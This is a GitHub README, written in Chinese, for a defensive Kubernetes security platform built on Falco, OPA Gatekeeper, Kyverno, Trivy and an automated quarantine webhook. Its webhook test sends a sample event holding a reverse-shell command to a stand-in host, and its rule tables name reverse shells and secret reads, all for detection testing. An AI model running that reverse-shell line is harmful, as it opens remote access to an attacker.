effiekarinea/k8s-security-platform

GitHub: effiekarinea/k8s-security-platform

面向 Kubernetes 集群的生产级纵深防御安全平台,整合 Falco 运行时检测、OPA/Kyverno 准入控制、Trivy 持续漏洞扫描与自动化隔离取证响应,覆盖从部署前策略拦截到部署后威胁处置的全生命周期。

Stars: 0 | Forks: 0

# Kubernetes 安全平台 [![Falco](https://img.shields.io/badge/Runtime_Security-Falco_0.37-00AEF3?logo=falco)](https://falco.org/) [![OPA](https://img.shields.io/badge/Admission_Control-OPA_Gatekeeper-4B5EC2?logo=openpolicyagent)](https://open-policy-agent.github.io/gatekeeper/) [![Kyverno](https://img.shields.io/badge/Policy_Engine-Kyverno-0059A1)](https://kyverno.io/) [![Trivy](https://img.shields.io/badge/Vulnerability_Scan-Trivy_Operator-1904DA)](https://trivy.dev/) [![MITRE](https://img.shields.io/badge/Framework-MITRE_ATT%26CK-red)](https://attack.mitre.org/matrices/enterprise/containers/) [![CIS](https://img.shields.io/badge/Benchmark-CIS_Kubernetes_1.8-blue)](https://www.cisecurity.org/benchmark/kubernetes) 适用于 EKS 的生产级 Kubernetes 运行时安全平台。在准入控制、运行时威胁检测、持续漏洞扫描和自动化事件响应方面实现了纵深防御——映射至 MITRE ATT&CK for Containers、CIS Kubernetes Benchmark 1.8、NIST 800-53 以及 PCI DSS。 ## 安全架构 大多数容器安全侧重于 CI/CD 流水线——在镜像部署前进行扫描。而本平台涵盖了部署**之后**发生的情况:在运行时检测威胁、在准入时执行策略、持续扫描运行中的工作负载,并自动响应事件。 ``` ┌─────────────────────────────────────────────────────────────────────┐ │ DEFENSE IN DEPTH LAYERS │ │ │ │ Layer 1 — ADMISSION CONTROL (prevent bad configs entering cluster) │ │ ┌────────────────────────┐ ┌──────────────────────────────────┐ │ │ │ OPA Gatekeeper │ │ Kyverno │ │ │ │ - No privileged pods │ │ - Verify Cosign signatures │ │ │ │ - Approved registries│ │ - Disallow :latest tag │ │ │ │ - Required labels │ │ - Drop ALL capabilities │ │ │ │ - Resource limits │ │ - Require seccomp profile │ │ │ │ - Non-root required │ │ - Auto-generate NetworkPolicies│ │ │ └────────────────────────┘ └──────────────────────────────────┘ │ │ │ │ Layer 2 — RUNTIME DETECTION (detect threats in running containers) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Falco (eBPF-based, every node via DaemonSet) │ │ │ │ - Crypto mining processes MITRE T1496 │ │ │ │ - Reverse shell attempts MITRE T1059 │ │ │ │ - Container privilege escalation MITRE T1611 │ │ │ │ - Sensitive file access MITRE T1552 │ │ │ │ - Package manager execution MITRE T1190 │ │ │ │ - Network scanning tools MITRE T1046 │ │ │ │ - kubectl exec detection MITRE T1609 │ │ │ │ - K8s API anomalies (anonymous access, secret reads) │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 3 — CONTINUOUS SCANNING (catch new CVEs post-deployment) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Trivy Operator (scans all running workloads continuously) │ │ │ │ - VulnerabilityReport per workload │ │ │ │ - ConfigAuditReport (K8s misconfigurations) │ │ │ │ - ExposedSecretReport (secrets in images) │ │ │ │ - RbacAssessmentReport │ │ │ │ - Prometheus metrics → alerts on new CRITICAL CVEs │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 4 — AUTOMATED RESPONSE (contain threats faster than humans) │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Falco → Falco Sidekick → auto-response.py webhook │ │ │ │ - Label pod as quarantined │ │ │ │ - Apply network isolation (deny all ingress/egress) │ │ │ │ - Capture forensic snapshot → S3 │ │ │ │ - Alert Slack + PagerDuty with full context │ │ │ │ - Optionally delete pod (restart from clean image) │ │ │ └─────────────────────────────────────────────────────────────┘ │ │ │ │ Layer 5 — AUDIT & COMPLIANCE │ │ ┌─────────────────────────────────────────────────────────────┐ │ │ │ Kubernetes Audit Policy + RBAC Hardening │ │ │ │ - Captures secret access, exec, privilege escalation │ │ │ │ - Least-privilege roles: security-auditor, developer, │ │ │ │ cicd-deployer, incident-responder │ │ │ │ - Prometheus alerts on RBAC anomalies │ │ │ └─────────────────────────────────────────────────────────────┘ │ └─────────────────────────────────────────────────────────────────────┘ ``` ## 合规覆盖范围 | 控制 | CIS K8s 1.8 | NIST 800-53 | PCI DSS | MITRE ATT&CK | |---|---|---|---|---| | 禁止特权容器 | 5.2.1 | AC-6 | 2.2 | T1611 | | 非根容器 | 5.2.6 | AC-6 | 2.2 | T1548 | | 只读根文件系统 | 5.2.8 | CM-7 | 2.2 | T1070 | | 丢弃所有 capabilities | 5.2.9 | AC-6 | 2.2 | T1548 | | 仅限已批准的镜像仓库 | — | CM-7 | 6.3 | T1525 | | 必需标签 | — | CM-8 | — | — | | 网络策略 | 5.3.2 | SC-7 | 1.3 | T1046 | | 挖矿检测 | — | SI-4 | 11.4 | T1496 | | Shell 生成检测 | — | SI-4 | 11.4 | T1059 | | Secret 访问审计 | 3.2.1 | AU-2 | 10.2 | T1552 | | 权限提升检测 | — | AU-2 | 10.2 | T1611 | | 最小权限 RBAC | 5.1.1 | AC-6 | 7.1 | — | | 审计日志 | 3.2.1 | AU-2 | 10.2 | — | | 持续 CVE 扫描 | — | SI-2 | 6.3 | — | | 镜像签名验证 | — | CM-14 | 6.3 | T1525 | ## 仓库结构 ``` k8s-security-platform/ +-- README.md +-- falco/ | +-- rules/enterprise-rules.yaml # 15 custom MITRE-mapped detection rules | +-- config/falco-values.yaml # Falco + Sidekick Helm config +-- gatekeeper/ | +-- constraint-templates/templates.yaml # 7 Rego policy templates | +-- constraints/constraints.yaml # Constraint instances + exemptions +-- kyverno/ | +-- policies/policies.yaml # Cosign verification, capabilities, seccomp +-- trivy-operator/ | +-- values.yaml # Continuous CVE scanning config +-- rbac/ | +-- rbac.yaml # Least-privilege roles + bindings +-- audit/ | +-- audit-policy.yaml # K8s audit policy (API server) +-- alerting/ | +-- prometheus/security-alerts.yaml # Prometheus security alert rules +-- scripts/ | +-- bootstrap.sh # One-command cluster security setup | +-- auto-response.py # Automated incident response webhook ``` ## 快速开始 ### 使用一条命令安装所有内容: ``` ./scripts/bootstrap.sh \ --cluster-name my-eks-cluster \ --region us-east-1 \ --slack-webhook https://hooks.slack.com/services/xxx/yyy/zzz ``` ### 或者单独安装各组件: ``` # OPA Gatekeeper helm upgrade --install gatekeeper gatekeeper/gatekeeper \ -n gatekeeper-system --create-namespace \ --set replicas=3 --wait kubectl apply -f gatekeeper/constraint-templates/templates.yaml sleep 15 # Wait for CRDs kubectl apply -f gatekeeper/constraints/constraints.yaml # Kyverno helm upgrade --install kyverno kyverno/kyverno \ -n kyverno --create-namespace --wait kubectl apply -f kyverno/policies/policies.yaml # Falco helm upgrade --install falco falcosecurity/falco \ -n falco --create-namespace \ --values falco/config/falco-values.yaml --wait # Trivy Operator helm upgrade --install trivy-operator aqua/trivy-operator \ -n trivy-system --create-namespace \ --values trivy-operator/values.yaml --wait # RBAC + Audit kubectl apply -f rbac/rbac.yaml kubectl apply -f alerting/prometheus/security-alerts.yaml ``` ## 验证平台 ### 检查 Gatekeeper 是否正在执行策略: ``` # 尝试部署特权 pod — 应被拒绝 kubectl run privileged-test \ --image=nginx \ --overrides='{"spec":{"containers":[{"name":"nginx","image":"nginx","securityContext":{"privileged":true}}]}}' # 预期:Error from server: admission webhook denied # 检查所有 constraints kubectl get constraints kubectl describe k8snoprivilegedcontainer no-privileged-containers ``` ### 触发 Falco 规则以进行测试: ``` # 在容器中生成 shell(触发“Shell Spawned in Container”规则) kubectl run test-pod --image=ubuntu --restart=Never --command -- sleep 3600 kubectl exec test-pod -- /bin/bash -c "echo test" # 查看 Falco 事件 kubectl logs -n falco -l app=falco --tail=20 -f ``` ### 检查 Trivy 漏洞报告: ``` # 查看所有 vulnerability reports kubectl get vulnerabilityreports -A # 获取特定 workload 的详情 kubectl describe vulnerabilityreport -n devsecops-prod # 查找集群中所有 CRITICAL CVEs kubectl get vulnerabilityreports -A -o json | \ jq '.items[] | select(.report.summary.criticalCount > 0) | {namespace: .metadata.namespace, name: .metadata.name, critical: .report.summary.criticalCount}' ``` ## Falco 规则参考 | 规则 | MITRE 战术 | MITRE 技术 | 优先级 | |---|---|---|---| | 检测到挖矿进程 | 影响 | T1496 | CRITICAL | | 反向 Shell 尝试 | 执行 | T1059 | CRITICAL | | 在运行中的容器内执行 | 横向移动 | T1609 | CRITICAL | | 创建特权 Pod | 权限提升 | T1611 | CRITICAL | | 对 K8s API 的匿名访问 | 初始访问 | T1190 | CRITICAL | | 容器权限提升 | 权限提升 | T1611 | HIGH | | 敏感文件访问 | 凭证访问 | T1552 | HIGH | | 容器内生成了 Shell | 执行 | T1059 | HIGH | | 检测到网络扫描工具 | 发现 | T1046 | HIGH | | 日志文件删除 | 防御规避 | T1070 | HIGH | | 设置了 Setuid/Setgid 位 | 权限提升 | T1548 | HIGH | | 意外用户访问了 K8s Secret | 凭证访问 | T1552 | HIGH | | 读取 Service Account Token | 凭证访问 | T1552 | MEDIUM | | 执行了包管理器 | 执行 | T1190 | MEDIUM | ## 自动化事件响应 当 Falco 检测到 CRITICAL 级别的事件时,响应 Webhook 将: 1. **为 Pod 打上标签**,标记为 `security.enterprise.com/quarantined: true` - 立即将其从 Service 端点中移除(停止流量) - 使受损情况在 `kubectl get pods` 中可见 2. **应用隔离 NetworkPolicy** — 拒绝该 Pod 的所有 ingress 和 egress 流量 3. **捕获取证快照** — 完整的 Pod spec、最后 500 行日志、K8s events — 使用 KMS 加密保存至 S3 4. **向 Slack + PagerDuty 发送警报**,并附带完整上下文(Pod、镜像、命令、namespace) 5. **(可选)删除该 Pod**(设置 `AUTO_DELETE_PODS=true`)— K8s 将从干净镜像重新启动它 ``` # 在本地运行 response webhook 进行测试 export SLACK_TOKEN=xoxb-... export S3_FORENSICS_BUCKET=my-forensics-bucket python3 scripts/auto-response.py --server --port 9090 # 使用 sample event 进行测试 curl -X POST http://localhost:9090/falco \ -H "Content-Type: application/json" \ -d '{"rule":"Reverse Shell Attempt","priority":"CRITICAL","output_fields":{"k8s.pod.name":"test-pod","k8s.ns.name":"default","container.image.repository":"nginx","proc.cmdline":"bash -i >& /dev/tcp/evil.com/4444 0>&1"}}' ``` ## 运维手册 ### 调查 Falco CRITICAL 级别警报 ``` # 1. 找到被隔离的 pod kubectl get pods -A -l security.enterprise.com/quarantined=true # 2. 获取隔离原因 kubectl get pod -n \ -o jsonpath='{.metadata.annotations}' # 3. 从 S3 获取 forensic logs aws s3 ls s3://forensics-bucket/falco-events/ --recursive aws s3 cp s3://forensics-bucket/falco-events///.json /tmp/forensics.json cat /tmp/forensics.json | jq . # 4. 调查后 — 移除隔离并删除 pod kubectl delete networkpolicy quarantine- -n kubectl delete pod -n ``` ### 检查集群中的 OPA 策略违规情况 ``` kubectl get constraintpodstatuses -A kubectl describe k8sallowedrepos approved-registries-only ``` ### 查看 namespace 的 Trivy 报告 ``` kubectl get vulnerabilityreports -n -o wide kubectl get configauditreports -n -o wide ``` ## 许可证 MIT
标签:AMSI绕过, Chrome Headless, CISA项目, CIS Kubernetes Benchmark 1.8, Cloudflare, Cosign镜像验证, Docker镜像, EKS, Falco, JSONLines, Kubernetes安全, MITRE ATT&CK, NIST 800-53, OPA Gatekeeper, PCI DSS, Pod隔离, Prometheus告警, StruQ, Trivy Operator, Web截图, 威胁检测, 子域名变形, 子域名突变, 容器安全, 敏感词过滤, 数据处理, 电子取证, 策略引擎, 纵深防御, 结构化提示词, 网络信息收集, 网络安全挑战, 自动化应急响应, 自定义请求头, 逆向工具, 零信任